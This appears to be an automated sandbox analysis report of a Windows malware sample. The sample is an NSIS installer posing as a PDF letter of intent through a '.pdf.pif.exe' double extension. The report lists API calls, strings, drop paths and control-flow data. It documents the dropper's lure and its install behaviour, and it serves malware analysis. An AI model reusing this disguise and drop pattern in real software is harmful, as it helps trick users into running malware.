3636->3635 3637->3635 3637->3636 3638->3608 3640 405c87 3639->3640 3641 405c47 RegQueryValueExW 3639->3641 3640->3626 3642 405c68 RegCloseKey 3641->3642 3642->3640 3650 405fe7 3644->3650 3645 40605d 3646 406062 CharPrevW 3645->3646 3649 406083 3645->3649 3646->3645 3647 406050 CharNextW 3647->3645 3647->3650 3649->3626 3650->3645 3650->3647 3651 40603c CharNextW 3650->3651 3652 40604b CharNextW 3650->3652 3656 4057db 3650->3656 3651->3650 3652->3647 3653->3626 3654->3626 3655->3615 3657 4057e1 3656->3657 3658 4057f7 3657->3658 3659 4057e8 CharNextW 3657->3659 3658->3650 3659->3657 5131 402222 5132 402229 5131->5132 5135 40223c 5131->5135 5133 405d68 18 API calls 5132->5133 5134 402236 5133->5134 5136 405529 MessageBoxIndirectW 5134->5136 5136->5135 3660 401924 3661 401926 3660->3661 3666 402ad0 3661->3666 3667 402adc 3666->3667 3668 405d68 18 API calls 3667->3668 3669 402afd 3668->3669 3670 40192b 3669->3670 3671 405fda 5 API calls 3669->3671 3672 4055d5 3670->3672 3671->3670 3713 4058b6 3672->3713 3675 4055fd DeleteFileW 3682 401934 3675->3682 3676 405755 3676->3682 3757 406089 FindFirstFileW 3676->3757 3677 405614 3677->3676 3727 405d46 lstrcpynW 3677->3727 3679 40563a 3680 405640 lstrcatW 3679->3680 3681 40564d 3679->3681 3684 405653 3680->3684 3728 4057fa lstrlenW 3681->3728 3687 405663 lstrcatW 3684->3687 3688 405659 3684->3688 3690 40566e lstrlenW FindFirstFileW 3687->3690 3688->3687 3688->3690 3689 405773 3760 4057ae lstrlenW CharPrevW 3689->3760 3692 40574a 3690->3692 3711 405691 3690->3711 3692->3676 3694 4057db CharNextW 3694->3711 3695 40558d 5 API calls 3696 405785 3695->3696 3697 405789 3696->3697 3698 40579f 3696->3698 3697->3682 3703 404ffa 25 API calls 3697->3703 3701 404ffa 25 API calls 3698->3701 3699 405729 FindNextFileW 3702 405741 FindClose 3699->3702 3699->3711 3701->3682 3702->3692 3704 405796 3703->3704 3705 405be0 40 API calls 3704->3705 3708 40579d 3705->3708 3707 4055d5 64 API calls 3707->3711 3708->3682 3709 404ffa 25 API calls 
3709->3699 3711->3694 3711->3699 3711->3707 3711->3709 3732 405d46 lstrcpynW 3711->3732 3733 40558d 3711->3733 3741 404ffa 3711->3741 3752 405be0 3711->3752 3763 405d46 lstrcpynW 3713->3763 3715 4058c7 3764 405859 CharNextW CharNextW 3715->3764 3718 4055f5 3718->3675 3718->3677 3719 405fda 5 API calls 3725 4058dd 3719->3725 3720 40590e lstrlenW 3721 405919 3720->3721 3720->3725 3723 4057ae 3 API calls 3721->3723 3722 406089 2 API calls 3722->3725 3724 40591e GetFileAttributesW 3723->3724 3724->3718 3725->3718 3725->3720 3725->3722 3726 4057fa 2 API calls 3725->3726 3726->3720 3727->3679 3729 405808 3728->3729 3730 40581a 3729->3730 3731 40580e CharPrevW 3729->3731 3730->3684 3731->3729 3731->3730 3732->3711 3770 4059aa GetFileAttributesW 3733->3770 3736 4055ba 3736->3711 3737 4055b0 DeleteFileW 3739 4055b6 3737->3739 3738 4055a8 RemoveDirectoryW 3738->3739 3739->3736 3740 4055c6 SetFileAttributesW 3739->3740 3740->3736 3742 405015 3741->3742 3751 4050b7 3741->3751 3743 405031 lstrlenW 3742->3743 3744 405d68 18 API calls 3742->3744 3745 40505a 3743->3745 3746 40503f lstrlenW 3743->3746 3744->3743 3748 405060 SetWindowTextW 3745->3748 3749 40506d 3745->3749 3747 405051 lstrcatW 3746->3747 3746->3751 3747->3745 3748->3749 3750 405073 SendMessageW SendMessageW SendMessageW 3749->3750 3749->3751 3750->3751 3751->3711 3773 4060b0 GetModuleHandleA 3752->3773 3756 405c08 3756->3711 3758 40576f 3757->3758 3759 40609f FindClose 3757->3759 3758->3682 3758->3689 3759->3758 3761 405779 3760->3761 3762 4057ca lstrcatW 3760->3762 3761->3695 3762->3761 3763->3715 3765 405876 3764->3765 3768 405888 3764->3768 3767 405883 CharNextW 3765->3767 3765->3768 3766 4058ac 3766->3718 3766->3719 3767->3766 3768->3766 3769 4057db CharNextW 3768->3769 3769->3768 3771 405599 3770->3771 3772 4059bc SetFileAttributesW 3770->3772 3771->3736 3771->3737 3771->3738 3772->3771 3774 4060d7 GetProcAddress 3773->3774 3775 4060cc LoadLibraryA 3773->3775 3776 405be7 3774->3776 3775->3774 3775->3776 
3776->3756 3777 405a52 lstrcpyW 3776->3777 3778 405aa1 GetShortPathNameW 3777->3778 3779 405a7b 3777->3779 3781 405ab6 3778->3781 3782 405bda 3778->3782 3801 4059cf GetFileAttributesW CreateFileW 3779->3801 3781->3782 3784 405abe wsprintfA 3781->3784 3782->3756 3783 405a85 CloseHandle GetShortPathNameW 3783->3782 3785 405a99 3783->3785 3786 405d68 18 API calls 3784->3786 3785->3778 3785->3782 3787 405ae6 3786->3787 3802 4059cf GetFileAttributesW CreateFileW 3787->3802 3789 405af3 3789->3782 3790 405b02 GetFileSize GlobalAlloc 3789->3790 3791 405bd3 CloseHandle 3790->3791 3792 405b24 ReadFile 3790->3792 3791->3782 3792->3791 3793 405b3c 3792->3793 3793->3791 3803 405934 lstrlenA 3793->3803 3796 405b55 lstrcpyA 3799 405b77 3796->3799 3797 405b69 3798 405934 4 API calls 3797->3798 3798->3799 3800 405bae SetFilePointer WriteFile GlobalFree 3799->3800 3800->3791 3801->3783 3802->3789 3804 405975 lstrlenA 3803->3804 3805 40597d 3804->3805 3806 40594e lstrcmpiA 3804->3806 3805->3796 3805->3797 3806->3805 3807 40596c CharNextA 3806->3807 3807->3804 5137 4040a9 lstrcpynW lstrlenW 5138 401cab 5139 402ab3 18 API calls 5138->5139 5140 401cb2 5139->5140 5141 402ab3 18 API calls 5140->5141 5142 401cba GetDlgItem 5141->5142 5143 4024e6 5142->5143 3838 40232f 3839 402335 3838->3839 3840 402ad0 18 API calls 3839->3840 3841 402347 3840->3841 3842 402ad0 18 API calls 3841->3842 3843 402351 RegCreateKeyExW 3842->3843 3844 40237b 3843->3844 3845 402729 3843->3845 3846 402ad0 18 API calls 3844->3846 3848 402396 3844->3848 3849 40238c lstrlenW 3846->3849 3847 4023a2 3851 4023bd RegSetValueExW 3847->3851 3855 402f38 3847->3855 3848->3847 3850 402ab3 18 API calls 3848->3850 3849->3848 3850->3847 3853 4023d3 RegCloseKey 3851->3853 3853->3845 3857 402f53 3855->3857 3856 402f80 3876 403160 ReadFile 3856->3876 3857->3856 3878 403192 SetFilePointer 3857->3878 3861 4030f6 3863 4030fa 3861->3863 3864 403112 3861->3864 3862 402f9d GetTickCount 3865 402fea 3862->3865 3869 4030e1 3862->3869 3867 

                                                                                      Control-flow Graph (function at 004031DD; legend: Executed / Not Executed; graph not reproduced)
                                                                                      APIs
                                                                                      • #17.COMCTL32 ref: 004031FC
                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403207
                                                                                      • OleInitialize.OLE32(00000000), ref: 0040320E
                                                                                        • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                        • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                        • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                      • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236
                                                                                        • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                                      • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",00000000), ref: 0040325E
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",00000020), ref: 00403285
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004033EF
                                                                                      • OleUninitialize.OLE32(?), ref: 0040349F
                                                                                      • ExitProcess.KERNEL32 ref: 004034BF
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",00000000,?), ref: 004034CB
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",00000000,?), ref: 004034D7
                                                                                      • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
                                                                                      • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,00435000,?), ref: 00403544
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,0042A9B8,00000001), ref: 00403558
                                                                                      • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
                                                                                      • ExitProcess.KERNEL32 ref: 0040363A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Similarity
                                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise$C:\Users\user\Desktop$C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                      • API String ID: 4107622049-2046466047
                                                                                      • Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                                      • Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
                                                                                      • Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                                      • Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E

                                                                                      Control-flow Graph (function at 00405139; legend: Executed / Not Executed; graph not reproduced)
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405198
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004051A7
                                                                                      • GetClientRect.USER32(?,?), ref: 004051E4
                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051EC
                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405288
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052A9
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004051B6
                                                                                        • Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052FB
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000050CD,00000000), ref: 00405309
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405310
                                                                                      • ShowWindow.USER32(00000000), ref: 00405334
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405339
                                                                                      • ShowWindow.USER32(00000008), ref: 00405380
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
                                                                                      • CreatePopupMenu.USER32 ref: 004053C3
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
                                                                                      • GetWindowRect.USER32(?,?), ref: 004053EB
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
                                                                                      • OpenClipboard.USER32(00000000), ref: 0040545A
                                                                                      • EmptyClipboard.USER32 ref: 00405460
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405476
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004054AA
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
                                                                                      • CloseClipboard.USER32 ref: 004054BB
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: $@d${
                                                                                      • API String ID: 590372296-278268938
                                                                                      • Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                                      • Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
                                                                                      • Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                                      • Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58

                                                                                      Control-flow Graph (function at 00405D68; legend: Executed / Not Executed; graph not reproduced)
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,?,00405031,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,00000000,0041D5A8), ref: 00405E2B
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405EA9
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00405EBC
                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00405F06
                                                                                      • CoTaskMemFree.OLE32(?), ref: 00405F11
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,?,00405031,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,00000000,0041D5A8), ref: 00405F8F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 900638850-3648785384

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 004055FE
                                                                                      • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 00405646
                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 00405669
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 0040566F
                                                                                      • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 0040567F
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405744
                                                                                      Strings
                                                                                      • "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe", xrefs: 004055DE
                                                                                      • \*.*, xrefs: 00405640
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                      • API String ID: 2035342205-873675662
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                      • LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                      • String ID:
                                                                                      • API String ID: 310444273-0
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise, xrefs: 004020F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise
                                                                                      • API String ID: 542301482-1474987328
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406094
                                                                                      • FindClose.KERNEL32(00000000), ref: 004060A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
                                                                                      • ShowWindow.USER32(?), ref: 00403B16
                                                                                      • DestroyWindow.USER32 ref: 00403B2A
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403B67
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403B82
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403C30
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403C3A
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403D4B
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403D6C
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
                                                                                      • EnableWindow.USER32(?,?), ref: 00403D99
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403DB6
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
                                                                                      • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
                                                                                      • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403F52
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: $@d
                                                                                      • API String ID: 3282139019-2057559402

                                                                                      Control-flow Graph (function at 0040371A; blocks marked Executed / Not Executed)
                                                                                      APIs
                                                                                        • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                        • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                        • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                      • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 0040379B
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403839
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright), ref: 00403882
                                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                      • RegisterClassW.USER32(00433E40), ref: 004038BF
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403942
                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
                                                                                      • RegisterClassW.USER32(00433E40), ref: 00403984
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$.DEFAULT\Control Panel\International$.exe$1033$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                      • API String ID: 914957316-3983456543

                                                                                      Control-flow Graph (function at 00402CFF; blocks marked Executed / Not Executed)
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402D10
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C
